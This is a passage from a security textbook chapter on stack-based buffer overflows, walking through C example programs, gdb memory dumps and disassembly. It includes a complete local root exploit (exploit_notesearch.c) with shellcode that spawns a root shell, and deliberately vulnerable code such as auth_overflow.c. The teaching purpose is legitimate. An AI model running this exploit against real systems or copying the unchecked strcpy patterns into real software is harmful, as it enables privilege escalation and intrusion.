Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.
C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.
While C’s simplicity increases the programmer’s control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn’t careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example.
Buffer Overflows
overflow_example.c
Code View:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
int value = 5;
char buffer_one[8], buffer_two[8];
strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */
printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two,
buffer_two);
printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one,
buffer_one);
printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value,
value);
printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1]));
strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */
printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two,
buffer_two);
printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one,
buffer_one);
printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}
By now, you should be able to read the source code above and figure out what the program does. After compilation in the sample output below, we try to copy ten bytes from the first command-line argument into buffer_two, which only has eight bytes allocated for it.
reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example.c
reader@hacking:~/booksrc $ ./overflow_example 1234567890
[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'
[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)
[STRCPY] copying 10 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'
[AFTER] buffer_one is at 0xbffff7f8 and contains '90'
[AFTER] value is at 0xbffff804 and is 5 (0x00000005)
reader@hacking:~/booksrc $
Notice that buffer_one is located directly after buffer_two in memory, so when ten bytes are copied into buffer_two, the last two bytes of 90 overflow into buffer_one and overwrite whatever was there.
A larger buffer will naturally overflow into the other variables, but if a large enough buffer is used, the program will crash and die.
reader@hacking:~/booksrc $ ./overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 29 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $
These types of program crashes are fairly common—think of all of the times a program has crashed or blue-screened on you. The programmer’s mistake is one of omission—there should be a length check or restriction on the user-supplied input. These kinds of mistakes are easy to make and can be difficult to spot. In fact, the notesearch.c program contains a buffer overflow bug. You might not have noticed this until right now, even if you were already familiar with C.
Code View:
reader@hacking:~/booksrc $ ./notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $
Program crashes are annoying, but in the hands of a hacker they can become downright dangerous. A knowledgeable hacker can take control of a program as it crashes, with some surprising results. The exploit_notesearch.c code demonstrates the danger.
exploit_notesearch.c
Code View:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
This exploit’s source code will be explained in depth later, but in general, it’s just generating a command string that will execute the notesearch program with a command-line argument between single quotes. It uses string functions to do this: strlen() to get the current length of the string (to position the buffer pointer) and strcat() to concatenate the closing single quote to the end. Finally, the system function is used to execute the command string. The buffer that is generated between the single quotes is the real meat of the exploit. The rest is just a delivery method for this poison pill of data. Watch what a controlled crash can do.
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#
The exploit is able to use the overflow to serve up a root shell—providing full control over the computer. This is an example of a stack-based buffer overflow exploit.
0×321. Stack-Based Buffer Overflow Vulnerabilities
The notesearch exploit works by corrupting memory to control execution flow. The auth_overflow.c program demonstrates this concept.
3.2.2.1. auth_overflow.c
Code View:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <password>\n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted.\n");
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
} else {
printf("\nAccess Denied.\n");
}
}
This example program accepts a password as its only command-line argument and then calls a check_authentication() function. This function allows two passwords, meant to be representative of multiple authentication methods. If either of these passwords is used, the function returns 1, which grants access. You should be able to figure most of that out just by looking at the source code before compiling it. Use the -g option when you do compile it, though, since we will be debugging this later.
reader@hacking:~/booksrc $ gcc -g -o auth_overflow auth_overflow.c
reader@hacking:~/booksrc $ ./auth_overflow
Usage: ./auth_overflow <password>
reader@hacking:~/booksrc $ ./auth_overflow test
Access Denied.
reader@hacking:~/booksrc $ ./auth_overflow brillig
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $ ./auth_overflow outgrabe
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $
So far, everything works as the source code says it should. This is to be expected from something as deterministic as a computer program. But an overflow can lead to unexpected and even contradictory behavior, allowing access without a proper password.
reader@hacking:~/booksrc $ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $
You may have already figured out what happened, but let’s look at this with a debugger to see the specifics of it.
Code View:
reader@hacking:~/booksrc $ gdb -q ./auth_overflow
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4
5 int check_authentication(char *password) {
6 int auth_flag = 0;
7 char password_buffer[16];
8
9 strcpy(password_buffer, password);
10
(gdb)
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
16 return auth_flag;
17 }
18
19 int main(int argc, char *argv[]) {
20 if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16.
(gdb)
The GDB debugger is started with the -q option to suppress the welcome banner, and breakpoints are set on lines 9 and 16. When the program is run, execution will pause at these breakpoints and give us a chance to examine memory.
Code View:
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at auth_overflow.c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0: ")????o??????)\20504\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0: 0xb7f9f729 0xb7fd6ff4 0xbffff7d8 0x08048529
0xbffff7b0: 0xb7fd6ff4 0xbffff870 0xbffff7d8 0x00000000
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb)
The first breakpoint is before the strcpy() happens. By examining the password_buffer pointer, the debugger shows it is filled with random uninitialized data and is located at 0xbffff7a0 in memory. By examining the address of the auth_flag variable, we can see both its location at 0xbffff7bc and its value of 0. The print command can be used to do arithmetic and shows that auth_flag is 28 bytes past the start of password_buffer. This relationship can also be seen in a block of memory starting at password_buffer. The location of auth_flag is shown in bold.
Code View:
(gdb) continue
Continuing.
Breakpoint 2, check_authentication (password=0xbffff9af 'A' <repeats 30 times>)
at auth_overflow.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0: 'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc: 0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc: 65 'A' 65 'A' 0 '' 0 ''
(gdb) x/dw &auth_flag
0xbffff7bc: 16705
(gdb)
Continuing to the next breakpoint found after the strcpy(), these memory locations are examined again. The password_buffer overflowed into the auth_flag, changing its first two bytes to 0x41. The value of 0x00004141 might look backward again, but remember that x86 has little-endian architecture, so it’s supposed to look that way. If you examine each of these four bytes individually, you can see how the memory is actually laid out. Ultimately, the program will treat this value as an integer, with a value of 16705.
(gdb) continue
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program exited with code 034.
(gdb)
After the overflow, the check_authentication() function will return 16705 instead of 0. Since the if statement considers any nonzero value to be authenticated, the program’s execution flow is controlled into the authenticated section. In this example, the auth_flag variable is the execution control point, since overwriting this value is the source of the control.
But this is a very contrived example that depends on memory layout of the variables. In auth_overflow2.c, the variables are declared in reverse order. (Changes to auth_overflow.c are shown in bold.)
auth_overflow2.c
Code View:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <password>\n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted.\n");
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
} else {
printf("\nAccess Denied.\n");
}
}
This simple change puts the auth_flag variable before the password_buffer in memory. This eliminates the use of the return_value variable as an execution control point, since it can no longer be corrupted by an overflow.
Code View:
reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb)
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
16 return auth_flag;
17 }
18
19 int main(int argc, char *argv[]) {
20 if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
at auth_overflow2.c:9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7c0: "?o??\200????????o???G??20\20504\b?????\20404\b????20\205\
004\bH???????02"
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc: 0x00000000 0xb7fd6ff4 0xbffff880 0xbffff7e8
0xbffff7cc: 0xb7fd6ff4 0xb7ff47b0 0x08048510 0xbffff7e8
0xbffff7dc: 0x080484bb 0xbffff9b7 0x08048510 0xbffff848
0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880
(gdb)
Similar breakpoints are set, and an examination of memory shows that auth_flag (shown in bold above and below) is located before password_buffer in memory. This means auth_flag can never be overwritten by an overflow in password_buffer.
Code View:
(gdb) cont
Continuing.
Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff7c0: 'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc: 0x00000000 0x41414141 0x41414141 0x41414141
0xbffff7cc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7dc: 0x08004141 0xbffff9b7 0x08048510 0xbffff848
0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880
(gdb)
As expected, the overflow cannot disturb the auth_flag variable, since it’s located before the buffer. But another execution control point does exist, even though you can’t see it in the C code. It’s conveniently located after all the stack variables, so it can easily be overwritten. This memory is integral to the operation of all programs, so it exists in all programs, and when it’s overwritten, it usually results in a program crash.
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)
Recall from the previous chapter that the stack is one of five memory segments used by programs. The stack is a FILO data structure used to maintain execution flow and context for local variables during function calls. When a function is called, a structure called a stack frame is pushed onto the stack, and the EIP register jumps to the first instruction of the function. Each stack frame contains the local variables for that function and a return address so EIP can be restored. When the function is done, the stack frame is popped off the stack and the return address is used to restore EIP. All of this is built in to the architecture and is usually handled by the compiler, not the programmer.
When the check_authentication() function is called, a new stack frame is pushed onto the stack above main()‘s stack frame. In this frame are the local variables, a return address, and the function’s arguments.
We can see all these elements in the debugger.
Figure 1.

Code View:
reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb)
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
16 return auth_flag;
17 }
18
19 int main(int argc, char *argv[]) {
20 if(argc < 2) {
(gdb)
21 printf("Usage: %s <password>\n", argv[0]);
22 exit(0);
23 }
24 if(check_authentication(argv[1])) {
25 printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
26 printf(" Access Granted.\n");
27 printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
28 } else {
29 printf("\nAccess Denied.\n");
30 }
(gdb) break 24
Breakpoint 1 at 0x80484ab: file auth_overflow2.c, line 24.
(gdb) break 9
Breakpoint 2 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 3 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2.c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xbffff7e0 0xbffff7e0
(gdb) x/32xw $esp
0xbffff7e0: 0xb8000ce0 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
0xbffff820: 0x40f5f7f0 0x48e0fe81 0x00000000 0x00000000
0xbffff830: 0x00000000 0xb7ff9300 0xb7eafded 0xb8000ff4
0xbffff840: 0x00000002 0x08048350 0x00000000 0x08048371
0xbffff850: 0x08048474 0x00000002 0xbffff874 0x08048510
(gdb)
The first breakpoint is right before the call to check_authentication()in main(). At this point, the stack pointer register (ESP) is 0xbffff7e0, and the top of the stack is shown. This is all part of main()‘s stack frame. Continuing to the next breakpoint inside check_authentication(), the output below shows ESP is smaller as it moves up the list of memory to make room for check_authentication()‘s stack frame (shown in bold), which is now on the stack. After finding the addresses of the auth_flag variable (
) and the variable password_buffer (
), their locations can be seen within the stack frame.
Code View:
(gdb) c
Continuing.
Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
at auth_overflow2.c:9 strcpy(password_buffer, password);
(gdb) i r esp
esp 0xbffff7a0 0xbffff7a0
(gdb) x/32xw $esp
0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9
0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8
0x00000000
0xbffff7c0:
0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4
0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb
0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
(gdb) p 0xbffff7e0 - 0xbffff7a0
$1 = 64
(gdb) x/s password_buffer
0xbffff7c0: "?o??\200????????o???G??20\20504\b?????\20404\b????20
\20504\bH???????02"
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb)
Continuing to the second breakpoint in check_authentication(), a stack frame (shown in bold) is pushed onto the stack when the function is called. Since the stack grows upward toward lower memory addresses, the stack pointer is now 64 bytes less at 0xbffff7a0. The size and structure of a stack frame can vary greatly, depending on the function and certain compiler optimizations. For example, the first 24 bytes of this stack frame are just padding put there by the compiler. The local stack variables, auth_flag and password_buffer, are shown at their respective memory locations in the stack frame. The auth_flag
is shown at 0xbffff7bc, and the 16 bytes of the password buffer
are shown at 0xbffff7c0.
The stack frame contains more than just the local variables and padding. Elements of the check_authentication() stack frame are shown below.
First, the memory saved for the local variables is shown in italic. This starts at the auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte password_buffer variable. The next few values on the stack are just padding the compiler threw in, plus something called the saved frame pointer. If the program is compiled with the flag -fomit-frame-pointer for optimization, the frame pointer won’t be used in the stack frame. At
the value 0x080484bb is the return address of the stack frame, and at
the address 0xbffffe9b7 is a pointer to a string containing 30 As. This must be the argument to the check_authentication() function.
Code View:
(gdb) x/32xw $esp
0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9
0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000
0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4
0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8
0x080484bb
0xbffff7e0:
0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
(gdb) x/32xb 0xbffff9b7
0xbffff9b7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff9bf: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff9c7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff9cf: 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x53
(gdb) x/s 0xbffff9b7
0xbffff9b7: 'A' <repeats 30 times>
(gdb)
The return address in a stack frame can be located by understanding how the stack frame is created. This process begins in the main() function, even before the function call.
Code View:
(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>: push ebp
0x08048475 <main+1>: mov ebp,esp
0x08048477 <main+3>: sub esp,0x8
0x0804847a <main+6>: and esp,0xfffffff0
0x0804847d <main+9>: mov eax,0x0
0x08048482 <main+14>: sub esp,eax
0x08048484 <main+16>: cmp DWORD PTR [ebp+8],0x1
0x08048488 <main+20>: jg 0x80484ab <main+55>
0x0804848a <main+22>: mov eax,DWORD PTR [ebp+12]
0x0804848d <main+25>: mov eax,DWORD PTR [eax]
0x0804848f <main+27>: mov DWORD PTR [esp+4],eax
0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5
0x0804849a <main+38>: call 0x804831c <printf@plt>
0x0804849f <main+43>: mov DWORD PTR [esp],0x0
0x080484a6 <main+50>: call 0x804833c <exit@plt>
0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]
0x080484ae <main+58>: add eax,0x4
0x080484b1 <main+61>: mov eax,DWORD PTR [eax]
0x080484b3 <main+63>: mov DWORD PTR [esp],eax
0x080484b6 <main+66>: call 0x8048414 <check_authentication>
0x080484bb <main+71>: test eax,eax
0x080484bd <main+73>: je 0x80484e5 <main+113>
0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>: call 0x804831c <printf@plt>
0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619
0x080484d2 <main+94>: call 0x804831c <printf@plt>
0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630
0x080484de <main+106>: call 0x804831c <printf@plt>
0x080484e3 <main+111>: jmp 0x80484f1 <main+125>
0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d
0x080484ec <main+120>: call 0x804831c <printf@plt>
0x080484f1 <main+125>: leave
0x080484f2 <main+126>: ret
End of assembler dump.
(gdb)
Notice the two lines shown in bold on page 131. At this point, the EAX register contains a pointer to the first command-line argument. This is also the argument to check_authentication(). This first assembly instruction writes EAX to where ESP is pointing (the top of the stack). This starts the stack frame for check_authentication() with the function argument. The second instruction is the actual call. This instruction pushes the address of the next instruction to the stack and moves the execution pointer register (EIP) to the start of the check_authentication() function. The address pushed to the stack is the return address for the stack frame. In this case, the address of the next instruction is 0x080484bb, so that is the return address.
(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x08048414 <check_authentication+0>: push ebp
0x08048415 <check_authentication+1>: mov ebp,esp
0x08048417 <check_authentication+3>: sub esp,0x38
...
0x08048472 <check_authentication+94>: leave
0x08048473 <check_authentication+95>: ret
End of assembler dump.
(gdb) p 0x38
$3 = 56
(gdb) p 0x38 + 4 + 4
$4 = 64
(gdb)
Execution will continue into the check_authentication() function as EIP is changed, and the first few instructions (shown in bold above) finish saving memory for the stack frame. These instructions are known as the function prologue. The first two instructions are for the saved frame pointer, and the third instruction subtracts 0x38 from ESP. This saves 56 bytes for the local variables of the function. The return address and the saved frame pointer are already pushed to the stack and account for the additional 8 bytes of the 64-byte stack frame.
When the function finishes, the leave and ret instructions remove the stack frame and set the execution pointer register (EIP) to the saved return address in the stack frame (
). This brings the program execution back to the next instruction in main() after the function call at 0x080484bb. This process happens every time a function is called in any program.
Code View:
(gdb) x/32xw $esp
0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9
0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000
0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4
0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8
0x080484bb
0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
(gdb) cont
Continuing.
Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/32xw $esp
0xbffff7a0: 0xbffff7c0 0x080485dc 0xbffff7b8 0x080482d9
0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000
0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7d0: 0x41414141 0x41414141 0x41414141
0x08004141
0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)
When some of the bytes of the saved return address are overwritten, the program will still try to use that value to restore the execution pointer register (EIP). This usually results in a crash, since execution is essentially jumping to a random location. But this value doesn’t need to be random. If the overwrite is controlled, execution can, in turn, be controlled to jump to a specific location. But where should we tell it to go?